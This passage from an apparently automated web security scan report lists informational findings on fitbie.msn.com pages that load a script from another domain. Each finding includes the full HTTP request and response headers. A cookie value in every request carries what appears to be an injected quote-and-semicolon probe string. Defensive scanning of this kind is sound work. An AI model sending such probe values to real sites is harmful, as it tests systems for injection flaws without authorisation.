Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:49 +0000
ETag: "1297607329-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43052
Expires: Mon, 14 Feb 2011 02:28:50 GMT
Date: Sun, 13 Feb 2011 14:31:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.38. http://fitbie.msn.com/videos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /videos

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /videos HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:00 +0000
ETag: "1297607340-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42724
Expires: Mon, 14 Feb 2011 02:28:59 GMT
Date: Sun, 13 Feb 2011 14:36:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.39. http://fitbie.msn.com/videos/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /videos/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /videos/ HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:02 +0000
ETag: "1297607342-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42729
Expires: Mon, 14 Feb 2011 02:29:10 GMT
Date: Sun, 13 Feb 2011 14:37:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.40. http://fitbie.msn.com/weight-loss-basics/tips/6-happiest-ways-beat-belly-fat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /weight-loss-basics/tips/6-happiest-ways-beat-belly-fat

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /weight-loss-basics/tips/6-happiest-ways-beat-belly-fat HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297603018-1"
Last-Modified: Sun, 13 Feb 2011 13:16:58 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=38450
Expires: Mon, 14 Feb 2011 01:18:06 GMT
Date: Sun, 13 Feb 2011 14:37:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.41. http://fitbie.msn.com/workout/15-minute-workout-strengthen-your-body-and-mind

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/15-minute-workout-strengthen-your-body-and-mind

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/15-minute-workout-strengthen-your-body-and-mind HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:44 +0000
ETag: "1297607324-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42856
Expires: Mon, 14 Feb 2011 02:29:41 GMT
Date: Sun, 13 Feb 2011 14:35:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.42. http://fitbie.msn.com/workout/3-moves-rev-your-metabolism

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/3-moves-rev-your-metabolism

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/3-moves-rev-your-metabolism HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:40 +0000
ETag: "1297607320-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42857
Expires: Mon, 14 Feb 2011 02:29:40 GMT
Date: Sun, 13 Feb 2011 14:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.43. http://fitbie.msn.com/workout/bob-harpers-fat-blasting-workout

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/bob-harpers-fat-blasting-workout

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/bob-harpers-fat-blasting-workout HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:45 +0000
ETag: "1297607325-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42745
Expires: Mon, 14 Feb 2011 02:27:52 GMT
Date: Sun, 13 Feb 2011 14:35:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.44. http://fitbie.msn.com/workout/lose-last-10-pounds

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/lose-last-10-pounds

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/lose-last-10-pounds HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:43 +0000
ETag: "1297607323-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42800
Expires: Mon, 14 Feb 2011 02:28:44 GMT
Date: Sun, 13 Feb 2011 14:35:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 88595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.45. http://fitbie.msn.com/workout/mens-health-muscle-system

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/mens-health-muscle-system

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/mens-health-muscle-system HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:43 +0000
ETag: "1297607323-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42800
Expires: Mon, 14 Feb 2011 02:28:44 GMT
Date: Sun, 13 Feb 2011 14:35:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 88973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.46. http://fitbie.msn.com/workout/muscle-memory-workout

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /workout/muscle-memory-workout

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /workout/muscle-memory-workout HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
